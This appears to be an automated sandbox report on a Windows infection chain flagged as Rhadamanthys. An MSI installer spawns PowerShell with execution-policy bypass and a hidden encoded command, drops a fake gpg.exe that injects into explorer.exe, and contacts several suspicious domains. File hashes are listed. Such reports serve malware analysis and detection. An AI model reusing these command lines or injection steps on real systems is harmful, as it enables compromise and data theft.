memory/468-10-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-9-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-11-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-12-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-13-0x00007FF9D5B30000-0x00007FF9D5B40000-memory.dmp
memory/468-14-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-15-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-16-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-17-0x00007FF9D5B30000-0x00007FF9D5B40000-memory.dmp
memory/468-18-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-19-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-20-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-21-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-22-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-23-0x00007FFA17A10000-0x00007FFA17ACD000-memory.dmp
memory/468-25-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-33-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-34-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-35-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-58-0x00007FF9D8290000-0x00007FF9D82A0000-memory.dmp
memory/468-59-0x00007FF9D8290000-0x00007FF9D82A0000-memory.dmp
memory/468-60-0x00007FF9D8290000-0x00007FF9D82A0000-memory.dmp
memory/468-61-0x00007FF9D8290000-0x00007FF9D82A0000-memory.dmp
memory/468-62-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-63-0x00007FFA17A10000-0x00007FFA17ACD000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-03-29 12:34
Reported
2024-03-29 12:44
Platform
win11-20240221-en
Max time kernel
436s
Max time network
446s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\mf\mspatchc.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-03-29 12:34
Reported
2024-03-29 12:34
Platform
win11-20240221-en
Max time kernel
2s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ninput\lsasrv.dll,#1
Network
Files
Analysis: behavioral14
Detonation Overview
Submitted
2024-03-29 12:34
Reported
2024-03-29 12:44
Platform
win11-20240319-en
Max time kernel
442s
Max time network
452s
Command Line
Signatures
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2360 created 2892 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\system32\sihost.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4644 set thread context of 2360 | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | C:\Windows\SysWOW64\explorer.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\MSIA87B.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8C35.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8DFC.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8E99.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e5786b4.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF8052F16E79F1A722.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5786b8.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF0C7C39F01A3AA06F.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF61814C6C9DBA5244.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5786b4.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8AFB.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8C15.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF829D7DB7C59C582F.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{40687992-D47D-43B1-8A2C-57D30E7D9D88} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8760.tmp | C:\Windows\system32\msiexec.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8hmxGifLP41ri2I\svchost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
| Process | Command line |
| C:\Windows\system32\sihost.exe | sihost.exe |
| C:\Windows\system32\msiexec.exe | msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi |
| C:\Windows\system32\msiexec.exe | C:\Windows\system32\msiexec.exe /V |
| C:\Windows\syswow64\MsiExec.exe | C:\Windows\syswow64\MsiExec.exe -Embedding 3F99D94B248A7DE3803C63D3E3377CF1 |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss8FA0.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi8F9D.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr8F9E.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr8F9F.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue." |
| C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | "C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe" |
| C:\Windows\SysWOW64\explorer.exe | explorer.exe |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -windowstyle hidden -e [encoded command not reproduced in this report] |
| C:\Users\Admin\AppData\Local\Temp\8hmxGifLP41ri2I\svchost.exe | "C:\Users\Admin\AppData\Local\Temp\8hmxGifLP41ri2I\svchost.exe" |
| C:\Windows\SysWOW64\dialer.exe | "C:\Windows\system32\dialer.exe" |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2360 -ip 2360 |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 2192 |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2360 -ip 2360 |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 2208 |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2360 -ip 2360 |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 2236 |
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | thecurl.monster | udp |
| US | 172.67.176.123:80 | thecurl.monster | tcp |
| US | 172.67.176.123:443 | thecurl.monster | tcp |
| US | 172.67.151.174:80 | death1488.com | tcp |
| GB | 93.93.131.124:443 | the.earth.li | tcp |
| US | 8.8.8.8:53 | curlhub.monster | udp |
| US | 172.67.204.219:443 | curlhub.monster | tcp |
| US | 8.8.8.8:53 | 219.204.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.143.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raur94.com | udp |
| US | 172.67.195.205:80 | raur94.com | tcp |
| US | 172.67.195.205:443 | raur94.com | tcp |
| US | 104.21.2.229:443 | checkass.monster | tcp |
| US | 8.8.8.8:53 | 35.206.58.216.in-addr.arpa | udp |
Files
C:\Windows\Installer\MSI8760.tmp
| MD5 | b158d8d605571ea47a238df5ab43dfaa |
| SHA1 | bb91ae1f2f7142b9099e3cc285f4f5b84de568e4 |
| SHA256 | ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504 |
| SHA512 | 56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591 |
C:\Windows\Installer\MSI8E99.tmp
| MD5 | fb4665320c9da54598321c59cc5ed623 |
| SHA1 | 89e87b3cc569edd26b5805244cfacb2f9c892bc7 |
| SHA256 | 9fb3156c665211a0081b189142c1d1ab18cda601ee54d5f5d8883ecfa4177a59 |
| SHA512 | b205552a3cfbaa2202e6ef7e39e229af167b2342a7dc4a2f4cadfe4d05000966cf19e9e208e44d6bb0fd6a56f4283caeed9c13f523e5b301b87f79febb1840cf |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jdfd43f3.cmu.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\pss8FA0.ps1
| MD5 | 30c30ef2cb47e35101d13402b5661179 |
| SHA1 | 25696b2aab86a9233f19017539e2dd83b2f75d4e |
| SHA256 | 53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f |
| SHA512 | 882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458 |
C:\Users\Admin\AppData\Local\Temp\scr8F9E.ps1
| MD5 | 753240f3d0c58563dcba1244db69b0d7 |
| SHA1 | 4a0f248fccc2431ece50f717cbf80f6681504932 |
| SHA256 | e77dbd670eaa228e96cb8ab002b0aa7f55a78779fb58754436ec691e6de14e5a |
| SHA512 | 03987837557d6342280d7871b19472e7c05cabc203824081f6fff38083ecef2da8135642644b598b21ee294816d1ed22d0573db04e5c739b2b08c28f7c441ae9 |
C:\Users\Admin\AppData\Local\Temp\msi8F9D.txt
| MD5 | eb0046beb949b23b97dccd59c4b8f131 |
| SHA1 | c084a9c15a323cd51d24122681a494e52577487f |
| SHA256 | b6594a624b47bcac9a314993f15693e5da2a747adeccff4a996f4ab4491d5467 |
| SHA512 | 8dfdbf11e27242ab14b0997637a9c3deb47d345183c306e0a9b6d62099f4b341dec49f8369bec7ef839e4003d8c7a86267646c9f7c28b8fe9456c3c69b2aeab0 |
C:\Config.Msi\e5786b7.rbs
| MD5 | 31b2be250bc4c946918c24bca8f8aa92 |
| SHA1 | 82ca9c2f47b796497cb7aa67021a7d7cf3c80a15 |
| SHA256 | 307ebb2baaee3f92b260173205ecd3c78f141c9ea0a7196c60ea5deb01768462 |
| SHA512 | 2ed84f9fc823d97311cd0b5f58a710c2ca81d31d414c871fce3440b0b658df9a939256f1bd7560af306ba43ea50254a7374795ed6e229ebbb61050493ad84eef |
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
| MD5 | 35365d3713500bde4e2e1422c54f04fa |
| SHA1 | 0b24b1de060caa7be51404d82da5fef05958a1da |
| SHA256 | 5f7e7bb9b2e73abda7e46bfb8b266dbbb7fd3b87ebb253d842ffcfb56f1efe19 |
| SHA512 | 3e276b947220e56da8798245e9e7a16c9899a3842658ef409518968b137474cba7f13955287d1ff2fa7f929dc3ce75a8fd4c1f5fe58e6edb9e89986080aad375 |
C:\Windows\Installer\e5786b4.msi
| MD5 | 86a68878633d570e195609fe33640561 |
| SHA1 | 5a5355a80750693493c4ff9d4184d3234ad62b73 |
| SHA256 | 7a5d8ef1b6de2d300a6a3118426562e881577c85ab2d919f0337e4de0e9aaa92 |
| SHA512 | 502f996aff0273aecd4256bd25b3bcd2187a2b44c1b26c0b64a622ae2d788328d8f8e9bbd8fa9119a0edb282d1737f8f502ecf69484a70b14fd287442630c1a9 |
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libgcrypt-20.dll
| MD5 | f74e6b15bbb4d3a8decb9fe17175d056 |
| SHA1 | 20a67c7d020bce3adcbd34cb0044771ae0bcb2ba |
| SHA256 | 50235ec9328d759d9adceb1224999bcf5d602594b2c6260c4f793b84c533e6d3 |
| SHA512 | 5c896a916537cbf6e4f6c995a240b3e651356e5a5fc549058cc60892c5905e64a3fd78cf0998149ca88f474f9ce78c94ea398bd245735a1b242f497adb44bbf4 |
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libassuan-0.dll
| MD5 | a2dd12a8ecef27ca0e524e9bb4bdb8f5 |
| SHA1 | a4f5718c8bc1cc1fba49332d767ad296f7156dbc |
| SHA256 | e54d43ae67352ceb170ece1fc1a219de9baf70cb71c1bf85a6c52858e2ca0ada |
| SHA512 | b35101d5454db885e4f47333365f3d3ce6ed20b94fb75f6965c6e04116967fb5179abaff92a2c20d47b634e81f5ac53e5e1f3def570dd95ae66a3663c0b1ea2c |
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libnpth-0.dll
| MD5 | b7b148054a2818699d93f96139b4d0d0 |
| SHA1 | 0a5187b37bd84c19a7d2d84f328fa0adbc75123c |
| SHA256 | 25fb8e6bb4ebd62bfa478691261ea2e9486020ef52084dad0fc5ea417338d915 |
| SHA512 | 4f9938a2fb9f6c81cf0dc5d98ecda955e101b5fd52cc43fd58f0072f5ed914c0ef966cd0666c3bcc32f70d52847a5caedea40de86db28c94c8ebd35b366552c1 |
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\zlib1.dll
| MD5 | 8f4cdaed2399204619310cd76fd11056 |
| SHA1 | 0f06ef5acde4f1e99a12cfc8489c1163dba910d1 |
| SHA256 | df14c4dcb9793a1298c3ef531299479c8bea32a9e8124355e6d3ba6b15416213 |
| SHA512 | 3d1e0453f10bece7b65fee3806bce9e36e2c526daa72d66774ed47684a591a978a80894b1643709e76db0adcf6f2dca189aa6413786a9b70c742ceaeec5b80dc |
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libsqlite3-0.dll
| MD5 | 0381964390751461a5d79d26ca7cedaa |
| SHA1 | 3b17b9dca5060f9b22920737165a6bd1de5e8941 |
| SHA256 | 7b307806698bfe2b8a81cf0d04cfd0df4a9916cba30707ce3934b9ee06bd75da |
| SHA512 | 381e6c2d49016ca2c4435526eb2ac4997f0c43c9bbe3ce56bc0ade3b5cc14677101c1297bbf2a10cec16242124a9246ca5e46003512719dc8360af007fb79b05 |
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libgpg-error-0.dll
| MD5 | 72498f59c8c580707a0a3839c332f51b |
| SHA1 | fb09b912912610d243066cc8b71435f689e6a449 |
| SHA256 | 51b69b17a15a4c8df35e81b9eef8b3c8eb914e8208f0ebbe9713661583cddf4d |
| SHA512 | 116956f25484e01236e5aaac2693e78dbc98e47580ac535a49582e21d69602be23f53f45945b0e94b2b0cf2825832a3e1c1f647302bd7b8398794f5579a0e022 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f2460fed3060a114d76eb39c96163832 |
| SHA1 | 0d94b2e590f03bd1dacd12d539288d5ba578db6a |
| SHA256 | 7562977b161dd9dc5d6bb23fc57358af12b7c7c0f435b648fe0befa1699253eb |
| SHA512 | a97039de7444650ba177b93c84a47a418aa5c0b7387ba3bdf2203563556b41d951e7393c965cc012e0b7e11c048c0671c6f366bd8fef1cd0cdf390d0ea44af24 |
C:\Users\Admin\AppData\Local\Temp\8hmxGifLP41ri2I\svchost.exe
| MD5 | a9c5924063a253f64fb86bc924be6996 |
| SHA1 | c39ba1e011318b3edf295d4bdde3d56b5de89972 |
| SHA256 | eb1b278b91a8f183f9749948abd9556ec21b03ca852c53e423d824d5d7cc3de4 |
| SHA512 | 57f0f5e8fa907d92feb6175ab32253bfef9f6acf25e5ce3273f12fd428e76a07ec7c8fc007dc2c13dc0c6841222d8874fb7e362d7cbe70f287583782cd3d311e |